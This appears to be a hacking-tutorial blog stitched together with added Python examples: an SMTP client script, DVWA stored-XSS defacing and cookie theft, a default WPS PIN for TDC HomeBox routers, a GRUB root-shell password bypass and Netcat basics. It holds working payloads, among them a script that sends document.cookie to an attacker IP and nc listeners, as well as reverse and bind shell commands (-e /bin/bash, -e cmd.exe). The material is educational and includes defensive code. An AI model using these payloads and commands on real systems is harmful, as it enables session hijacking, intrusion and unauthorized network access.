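    while True:
        line = readline().decode("latin-1").rstrip("\r\n")
        if len(line) < 3:
            raise SmtpError(f"malformed reply: {line!r}")
        lines.append(line)
        if len(line) == 3 or line[3] != "-":
            return int(line[:3]), lines


def smtp_send(transport, helo_name: str, mail_from: str, rcpt_to: str,
              subject: str, body: str) -> List[Tuple[Optional[str], int]]:
    """Unauthenticated port-25 SMTP, the dialogue typed above. Returns
    [(command, reply code), ...] and raises SmtpError on an unexpected code."""
    transcript = []

    def step(command: Optional[str], expected: set) -> None:
        if command is not None:
            transport.send(command.encode("latin-1") + b"\r\n")
        code, lines = read_reply(transport.readline)
        transcript.append((command, code))
        if code not in expected:
            raise SmtpError(f"{command!r} -> {lines[-1]}")

    step(None, {220})                               # server greeting
    step(f"HELO {helo_name}", {250})                # our own name, not the server's
    step(f"MAIL FROM:<{mail_from}>", {250})
    step(f"RCPT TO:<{rcpt_to}>", {250, 251})
    step("DATA", {354})
    message = f"Subject: {subject}\r\n\r\n{body}".replace("\r\n.", "\r\n..")  # dot-stuffing
    step(message + "\r\n.", {250})                  # a lone '.' ends the message
    step("QUIT", {221})
    return transcript


class SocketTransport:
    """Real network transport for smtp_send()."""
    def __init__(self, host: str, port: int = 25, timeout: float = 30.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.reader = self.sock.makefile("rb")

    def send(self, data: bytes) -> None:
        self.sock.sendall(data)

    def readline(self) -> bytes:
        return self.reader.readline()


class ScriptedTransport:
    """Constructed stand-in for a socket: replays canned replies, records what was sent."""
    def __init__(self, replies: List[bytes]):
        self.replies, self.sent = list(replies), []

    def send(self, data: bytes) -> None:
        self.sent.append(data)

    def readline(self) -> bytes:
        return self.replies.pop(0)


# Constructed sample data, modelled on what the screenshots in the post show.
SAMPLE_HTTP_RESPONSE = (b"HTTP/1.1 200 OK\r\nDate: Thu, 01 Jan 2015 12:00:00 GMT\r\n"
                        b"Server: Apache/2.2.16 (Debian)\r\nContent-Type: text/html\r\n\r\n")
SAMPLE_SMTP_REPLIES = [
    b"220 mx.example.net ESMTP ready\r\n", b"250 mx.example.net at your service\r\n",
    b"250 2.1.0 OK\r\n", b"250 2.1.5 OK\r\n", b"354 Go ahead\r\n",
    b"250 2.0.0 OK queued\r\n", b"221 2.0.0 closing connection\r\n",
]

if __name__ == "__main__":
    print("banner:", server_banner(SAMPLE_HTTP_RESPONSE))
    t = ScriptedTransport(SAMPLE_SMTP_REPLIES)
    print(smtp_send(t, "client.example.org", "alice@example.org", "bob@example.net",
                    "testmail", "This is just a test"))
```

Swapping ScriptedTransport for SocketTransport("alt1.gmail-smtp-in.l.google.com") reproduces the telnet session; a relay refusal (a 550 on RCPT TO) surfaces as an SmtpError instead of being lost in the scrollback.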

    Defacing and Cookie Stealing with Cross-site scripting

In a cross-site scripting (XSS) attack the attacker injects script into input forms, search fields or site URLs so that it ends up in a page the site serves to other users, whose browsers then run it as if it were part of the site. The object of this tutorial is to show the dangers of XSS, why you should never trust user input, and why you must encode user-supplied data when you write it into a page.

For this tutorial I will be using Damn Vulnerable Web Application (DVWA), a web application designed for practising penetration testing in your own environment, safely and legally. This tutorial does not include the steps needed to set up DVWA.

1. Navigate to your DVWA site, here http://localhost/DVWA-1.0.8/login.php

2. Log in with the username admin and password password

3. Click the DVWA Security button

4. Select low in the drop-down list and press the Submit button

    The XSS test

DVWA is now set to do no filtering or encoding of form input, which means that anything you enter is accepted and written into the page as-is.

1. Click the XSS stored button

Here we have a simple guestbook where visitors can enter a message which is displayed for everyone to see. The idea, of course, is for a user to enter some text that the next users can read. The message can however contain a small script, which the next users' browsers will execute. The first step is to test whether the site is actually vulnerable to XSS. We do this with a small piece of JavaScript that calls the alert function to pop up a message box in the visitor's browser.

2. Click in the field Name and type test

3. Click in the field Message and type:

<script>alert(1);</script>

4. Click the Sign Guestbook button

The signed guestbook entry now appears to have an empty message. That is because the browser treats the script as part of the page's code, not as user text to be shown.

5. Click the XSS stored button again to reload the page

A popup titled "The page at localhost says:" opens, with the content 1. This is your browser running the JavaScript we wrote earlier. It is harmless, but it proves that the site is vulnerable. DVWA has a handy feature to reset the database, and with it the guestbook messages. We will do this before trying anything else.

6. Click the Setup button

7. Click the Create / Reset Database button

Defacing with XSS

Okay, so you might be thinking "All right, you can make a popup, big deal!" Let's try using XSS to deface the guestbook by redirecting its visitors to another site. Again we use JavaScript, this time to send the browser to another location.

1. Click the XSS stored button

2. Click in the field Name and type Deface

3. Click in the field Message and type:

<script>window.location="http://ifconfig.dk";</script>

4. Click the Sign Guestbook button

Again nothing is shown in the message field, because the browser does not treat the script as part of a plain-text comment.

5. Click the XSS stored button again to reload the page

You are redirected to ifconfig.dk. Every time a user visits the guestbook their browser will be sent to ifconfig.dk instead of showing the guestbook. Let's reset the database again before the next attack.

6. Go back to http://localhost/DVWA-1.0.8/setup.php and press the Create / Reset Database button

    Cookie stealing with XSS

Let's turn it up a notch. In this scenario we have an attacker on another computer who has an account on our DVWA site, but not the admin account. His objective is to plant an XSS payload that steals the admin's session cookie, sends it to him, and lets him take over the admin account.

The server running our DVWA site is a Windows computer with the IP address 192.168.1.16. The attacker's computer runs BackTrack and has the IP address 192.168.1.14.

1. On the BackTrack computer navigate to the DVWA site at http://192.168.1.16/DVWA-1.0.8/login.php

2. Log in with the username 1337 and password charley

3. Click the XSS stored button

4. Click in the field Name and type Cookie

5. Click in the field Message and type:

<script>new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;</script>

6. Click the Sign Guestbook button

What this JavaScript does is try to load an image from the BackTrack computer. The cookies of whoever views the guestbook entry, including their session cookie, go along in the query string of the image request and thus land on the attacker's computer. The page cookie.php does not exist on our BackTrack computer; in the real world an attacker would set up a small PHP script to receive the sessions and save them to a file. In this scenario we simply capture the raw traffic by running a netcat listener on the BackTrack computer that listens (-l) verbosely (-v) on port (-p) 80.

    7. Open a terminal window and type nc -lvp 80

    We are now all set for the attack. The attacker can only wait for the admin to visit the guestbook. Let’s play the role of the unknowing admin for a moment.

    8. From the Windows computer visit the site http://localhost/DVWA-1.0.8/login.php

    9. Login with the username admin and password password

    10. Click the XSS stored button

    Cookie2_edited

    The unknowing admin will just be shown an empty message with the title Cookie. But behind the scenes a packet containing the session cookie is sent to the attacker’s computer. Here is what it looks like in Wireshark.

    wireshark_edited

    Right – let’s put on our black hat and play the role of the attacker again. In the terminal window we will see that a session has been received. We now want to use this session to gain access to the admin account on the DVWA site. This can be done in a variety of ways – here we are going to use a Firefox plugin called Cookies Manager+.

    Cookie3_edited

    11. On the Backtrack computer open Firefox and install Cookies Manager+

    12. Navigate to the DVWA website at http://192.168.1.16/DVWA-1.0.8/

    13. Press Tools | Cookies Manager+

    The Cookies Manager+ tool opens. We now want to replace the session cookie of the user 1337 with the session of the user admin.

    14. Double click the session cookie for the host 192.168.1.16 named PHPSESSID

    15. In the Edit cookie window, replace the value in the field Content with the session id captured in the terminal

    Cookie4_edited

    16. Press the Save button to close the Edit Cookie window

    17. Press the Close button to close the Cookies Manager+ tool

    18. Press F5 to refresh the page

    Cookie5_edited

    Voila – the attacker has now gained access to the admin account without ever knowing the password. There is much more to XSS than this, but I think this demonstrates just how dangerous XSS attacks can be. Hopefully web site developers as well as browser developers will be aware of this danger, so that users can browse sites without being betrayed by their own web browsers.
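To make the two halves of this attack concrete from the defender's side, here is an added Python example (not code from the post or from DVWA). It renders a guestbook entry the way a stored-XSS page does, i.e. by concatenating user input into the HTML, next to the hardened form that HTML-escapes on output; it then models the browser rule the theft relies on, namely that document.cookie only exposes cookies set without the HttpOnly attribute. The payload string is the one typed into the guestbook above; the function names and the sample Set-Cookie values are my own.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed input: the guestbook payload from the walkthrough above.
PAYLOAD = ('<script>new Image().src="http://192.168.1.14/cookie.php?"'
           '+document.cookie;</script>')

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_entry_vulnerable(name, message):
    """Stored-XSS shape: user input is concatenated straight into the page,
    so a <script> tag in the message runs in every visitor's browser."""
    return f"<div class='entry'><b>{name}</b><p>{message}</p></div>"


def render_entry_escaped(name, message):
    """Hardened shape: HTML-escape on output, so the same text is shown
    literally (as &lt;script&gt;...) and is never parsed as markup."""
    return (f"<div class='entry'><b>{html.escape(name)}</b>"
            f"<p>{html.escape(message)}</p></div>")


def contains_live_script(rendered_html):
    """True if the rendered page still carries an unescaped <script> tag."""
    return SCRIPT_TAG.search(rendered_html) is not None


def cookies_visible_to_script(set_cookie_value):
    """Model the browser rule the attack depends on: document.cookie exposes
    every cookie that was NOT set with the HttpOnly attribute. Takes the
    value part of a Set-Cookie header (a constructed sample in the tests)."""
    jar = SimpleCookie()
    jar.load(set_cookie_value)
    return [name for name, morsel in jar.items() if not morsel["httponly"]]


if __name__ == "__main__":
    print(render_entry_vulnerable("Cookie", PAYLOAD))
    print(render_entry_escaped("Cookie", PAYLOAD))
    print(cookies_visible_to_script("PHPSESSID=abc123; Path=/"))
    print(cookies_visible_to_script("PHPSESSID=abc123; HttpOnly; Path=/"))
```

Output escaping removes the injection itself; HttpOnly on the session cookie only removes the cookie-theft outcome, since an injected script can still send requests on the victim's behalf. Both are worth having.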

    Notes

    Whether or not users are hit by XSS attacks depends very much on the web browser used. Some browsers block certain types of XSS attacks which others don’t, and vice versa. Using a plugin like NoScript in your browser helps, since no client-side scripts will be run without your permission.

    *A few pointers for setting up DVWA:
    Edit this file to allow access to the site from other clients on your network:
    www\DVWA-1.0.8\.htaccess
    Edit this file to change the maximum number of characters in the input field:
    www\DVWA-1.0.8\vulnerabilities\xss_s\index.php

    Credit for the use of DVWA and the cookie stealing technique goes here and here.


    Hack TDC HomeBox in seconds


    In one of my previous posts I explained a little bit about the flaw in the WPS system and how to exploit it. To summarize, the flaw in WPS enables you to brute-force the eight-digit PIN code and thereby get access to an otherwise secured wireless network. While the flaw is still there, many router manufacturers have “fixed” this by limiting the number of WPS attempts on their device before locking up for a certain amount of time. The same is true for the TDC HomeBox.

    The TDC HomeBox is preconfigured for the typical user with a predefined SSID of HomeBox-xxxx, where xxxx represents the last four digits of the MAC address. When logging on for the first time, users are instructed to use the WPS PIN from a sticker on their router. After that, they are good to go. Do you think the average user logs on to the router and disables WPS afterwards? In other words – there are a hell of a lot of preconfigured routers out there which never get reconfigured after the initial setup! And here is the fun part – all TDC HomeBoxes I have come across seem to accept the WPS PIN 12345670 – the first PIN that the WPS brute-force application Reaver tries!

    WPShacked

    Of course, I tried contacting TDC regarding this problem. I got in touch with a friendly administrator at TDC Forum who asked me to mail him some details, and he would forward them to the proper authorities, who would then contact me directly. I wrote a long mail explaining the problem and sent it to him the same day. A week passed with no response. I wrote the guy asking if he had gotten the mail, and still nothing. It has been a month since I sent the mail – I guess that means TDC thinks it is not relevant information?

    Of course, I could be wrong and not all TDC HomeBoxes are affected, but I have yet to find one that is not. Here are pictures of four totally different boxes, which all seem to accept the WPS PIN 12345670 and were thereby all hacked within seconds.

    4tuimesfun_edited

    TDC is one of the biggest ISPs in Denmark. Have a look at the wireless networks in your area – chances are there are one or more HomeBox-xxxx networks nearby. In my opinion you might as well put up a big sign saying FREE WIFI. If you own one of these boxes yourself, please log in and disable WPS.


    Hack Ubuntu Account Password

    In the tutorial Hack Windows 7 Account Password, I showed that having an account password on a Windows computer does not mean that it is unbreakable. In this tutorial we are going to have a look at how to do something similar on a Linux-based system – Ubuntu – by hacking the GNU GRUB loader.

    loginunsucess_edited

    We have a system running Ubuntu 12.10, which we cannot log in to because we do not have the correct password. The objective is to remove the password and gain access.

    1. At boot press Shift to bring up the GRUB loader

    2. Mark the boot option you want to use – here Ubuntu – and press e

    GRUB1

    3. Navigate down to the text linux /boot/vmlinuz-3.5

    We are now going to trick the GNU GRUB loader into dropping the normal boot process and instead booting straight into a shell with root privileges.

    GRUB3_edited

    4. Change the argument ro to rw

    5. Remove the text splash $vt_handoff

    6. Add the text init=/bin/sh

    GRUB4_edited

    Changing ro (read only) to rw (read write) allows the root account to change system files during boot instead of just reading them. We don’t need splash $vt_handoff, since it only has to do with the graphics shown during boot. Finally we add init=/bin/sh to tell the kernel to execute a shell instead of the standard init.

    7. Press F10 to reboot

    We have rebooted into a shell; let’s check who we are logged in as.

    8. Type whoami

    Nice, we are logged in as root – unlimited power is at our fingertips! Now we want to remove the password for the account hegelund. This can be done in a number of ways; in this tutorial we are going to do it by editing the password hash directly in the shadow file.

    9. Type nano /etc/shadow

    shell1

    10. Navigate to the desired username – here hegelund

    shell2_edited

    11. Remove the hash value of the password (the field of the form $hashtype$salt$hash)

    12. Press Ctrl + X to exit

    13. Press Y to save the changes and confirm by pressing Enter

    shell5_edited

    14. Reboot the computer

    15. Choose the boot option you want to use – here Ubuntu – and press Enter

    The changes made in the GNU GRUB loader are not permanent, so after the reboot the system should boot up as normal.

    16. Log in as the user hegelund without a password

    loginsucess_edited

    The method should work on all Debian-based systems using the GNU GRUB loader. This tutorial serves to prove that if you store sensitive information on your system, you should not rely on an account password alone. Credit for the method goes here.
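The end state of this walkthrough, an account whose shadow entry has an empty password field, is something an administrator can audit for. Below is an added Python example (not from the post) that parses shadow(5) lines, classifies each account's password field as empty, locked or hashed, and names the crypt(3) scheme of hashed entries. The sample shadow content is constructed for the example, with placeholder hash values; the hegelund line is in the state step 11 above leaves it in. The lasting fixes, a GRUB superuser password so boot entries cannot be edited and full-disk encryption so the shadow file cannot be reached from a boot shell, are outside what a script can check, but this catches the symptom.

```python
import re

# Constructed sample /etc/shadow content (not taken from the post). The
# 'hegelund' line has an empty second field, i.e. no password at all, which
# is what blanking the hash in the walkthrough produces. Hashes are placeholders.
SAMPLE_SHADOW = """\
root:$6$rQ9k3Lx7$placeholderhashvalue:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
hegelund::19000:0:99999:7:::
alice:$y$j9T$saltsalt$placeholderyescrypthash:19000:0:99999:7:::
bob:!$6$saltsalt$placeholderlockedhash:19000:0:99999:7:::
"""

# crypt(3) scheme identifiers as they appear between the first two '$'.
HASH_IDS = {"1": "md5", "2a": "bcrypt", "2b": "bcrypt",
            "5": "sha256", "6": "sha512", "y": "yescrypt"}


def parse_shadow(text):
    """Split shadow(5) lines into (user, password-field) pairs. The other
    seven fields hold password-aging data and are not needed for this check."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 9:
            continue  # malformed line, skip rather than misreport
        entries.append((fields[0], fields[1]))
    return entries


def classify_password_field(field):
    """'empty'  : login possible with no password at all
       'locked' : '*' or leading '!' - no password login for this account
       'hashed' : a normal $id$salt$hash value
       'other'  : anything else (legacy DES hashes, garbage)"""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    if field.startswith("$"):
        return "hashed"
    return "other"


def hash_algorithm(field):
    """Name the crypt(3) scheme of a hashed field, or None if not hashed."""
    m = re.match(r"\$([^$]+)\$", field)
    return HASH_IDS.get(m.group(1), "unknown") if m else None


def audit_shadow(text):
    """Group account names by the state of their password field."""
    report = {"empty": [], "locked": [], "hashed": [], "other": []}
    for user, field in parse_shadow(text):
        report[classify_password_field(field)].append(user)
    return report


if __name__ == "__main__":
    report = audit_shadow(SAMPLE_SHADOW)
    for state, users in report.items():
        print(f"{state:7s}: {', '.join(users) or '-'}")
    for user, field in parse_shadow(SAMPLE_SHADOW):
        print(user, hash_algorithm(field))
```

Run it against a real file with `audit_shadow(open("/etc/shadow").read())` as root; any name under "empty" is an account that can be logged into without a password, whatever the reason.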


    Netcat Basics


    Netcat is an awesome network tool which can be used for pretty much anything network related. File transfers, remote access, tunneling and network debugging are some of the common tasks it is used for. Netcat is available for both *nix and Windows systems. In this tutorial we are going to be using Netcat as a simple chat client, for file transfers, as a web server and for remote access. We will be using two systems, a Windows 7 client with the IP 192.168.1.100 and a Linux client with the IP 192.168.1.115.

    1. Open a command prompt on the Windows client and type nc -lvp 2222

    This tells Netcat to start Listening Verbosely on Port 2222. There is no specific reason for using this port; it was just randomly chosen. We will now ask the Linux client to connect to the IP of the Windows client on port 2222.

    2. In a shell on the Linux client type nc 192.168.1.100 2222

    3. Type Hello World and press Enter

    4. Go back to the Windows Command Prompt and type Hack the Gibson and press Enter

    connection1_edited

    We are able to transfer raw text from one system to another via TCP/IP on a specific port. Let’s try transferring a file instead. We do this by telling Netcat on the Linux client to Listen Verbosely on Port 1717 and output (>) whatever data is transferred to a file called test.txt. Then we ask Netcat on the Windows client to connect to the IP 192.168.1.115 and input (<) a file containing some text, also called test.txt.

    5. On the Linux client type nc -lvp 1717 > test.txt

    6. On the Windows client create a file called test.txt containing the text This is a test

    7. Type nc 192.168.1.115 1717 < test.txt

    The data is now transferred and saved to the file test.txt on the Linux client. Now open up the file and check that the data was transferred.

    filetransfer_edited

    8. Press Ctrl+C to close the open connection

    9. On the Linux client type nano test.txt

    filetransfer2_edited

    We can see that the text This is a test was transferred from the Windows client to the Linux client. Now that we know how to do this, we can try serving a picture on port 80 – the port normally used for web traffic – and thereby use Netcat as a web server. In this tutorial we are using the picture cool.jpg.

    10. On the Linux client type nc -lvp 80 < cool.jpg

    11. From the Windows client open a web browser and go to http://192.168.1.115/

    webserver_edited

    The picture is shown in the web browser. Note that a lot of information about the connection is shown in the terminal window, just like a real web server would log web traffic. We are now going to have a look at how to create a remote shell from the Linux client to the Windows client’s command prompt. We do this by binding the command prompt to Netcat with the -e cmd.exe parameter. This time we randomly pick the port 1337.

    12. From the Windows client type nc -lvp 1337 -e cmd.exe

    13. From the Linux client type nc 192.168.1.100 1337

    remotecmd_edited

    We now have a remote shell to the Windows system running via Netcat. Now let’s try it the other way around and make a remote shell to the Linux client’s bash shell from the Windows client. We do this by binding the bash shell with the -e /bin/bash parameter on port 7777.

    14. From the Windows client type nc -lvp 7777

    15. From the Linux client type nc -nv 192.168.1.100 7777 -e /bin/bash

    16. From the Windows client type pwd to confirm the connection was made

    remotebash_edited

    We can see that we are in the /root directory indicating that we do in fact have remote shell access to the Linux client.
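To show what the listener and the sender in the file transfer (steps 5 to 9) are actually doing on the wire, here is an added Python example that is not part of the post and not Netcat's own code: it runs both roles over loopback in one process, with the sender half-closing the connection to signal end of data, which is the EOF that `nc ... < test.txt` produces when the file is exhausted. It also builds a minimal well-formed HTTP/1.0 reply, because the `nc -lvp 80 < cool.jpg` trick in step 10 sends the bare file with no status line or headers and only works where the browser accepts such a headerless response. The function names and the sample payload are my own; port 0 is used so the OS picks a free port instead of the post's 1717.

```python
import socket
import threading


def _receive_until_eof(listener, chunks):
    """Listener role ('nc -lvp PORT > file'): accept one connection and read
    until the peer signals that it has no more data to send."""
    conn, _peer = listener.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:          # empty read: the peer closed its sending side
                break
            chunks.append(data)


def transfer(payload):
    """Run both roles of the file-transfer exchange over loopback and return
    the bytes the listener collected. Port 0 lets the OS choose a free port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    chunks = []
    receiver = threading.Thread(target=_receive_until_eof, args=(listener, chunks))
    receiver.start()

    # Sender role ('nc HOST PORT < file'): connect, push the data, half-close.
    with socket.create_connection(("127.0.0.1", port), timeout=5) as sender:
        sender.sendall(payload)
        sender.shutdown(socket.SHUT_WR)   # the EOF that tells the listener "done"

    receiver.join(timeout=5)
    listener.close()
    return b"".join(chunks)


def build_http_response(body, content_type):
    """A minimal but well-formed HTTP/1.0 reply for a static file. Serving a
    bare file with 'nc -lvp 80 < cool.jpg' sends none of these headers."""
    headers = (
        b"HTTP/1.0 200 OK\r\n"
        b"Content-Type: " + content_type.encode("ascii") + b"\r\n"
        b"Content-Length: " + str(len(body)).encode("ascii") + b"\r\n"
        b"Connection: close\r\n\r\n"
    )
    return headers + body


if __name__ == "__main__":
    # Constructed sample input matching the post's test.txt.
    print(transfer(b"This is a test\n"))
    # Constructed stand-in for cool.jpg: just the JPEG SOI marker bytes.
    print(build_http_response(b"\xff\xd8\xff\xe0", "image/jpeg")[:64])
```

The half-close is the part worth noticing: a TCP connection has two independent directions, and the receiver's loop ends only when the sender's direction is closed. A listener that never sees that close (for instance when the sending side stays open after its input is exhausted) keeps waiting, which is why step 8 above has to press Ctrl+C.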

    Netcat is often referred to as the TCP/IP Swiss Army knife, since its capabilities are limited, close to, only by the TCP/IP protocol and your imagination. It’s a really handy tool to know how to work with when you are doing anything networking related.
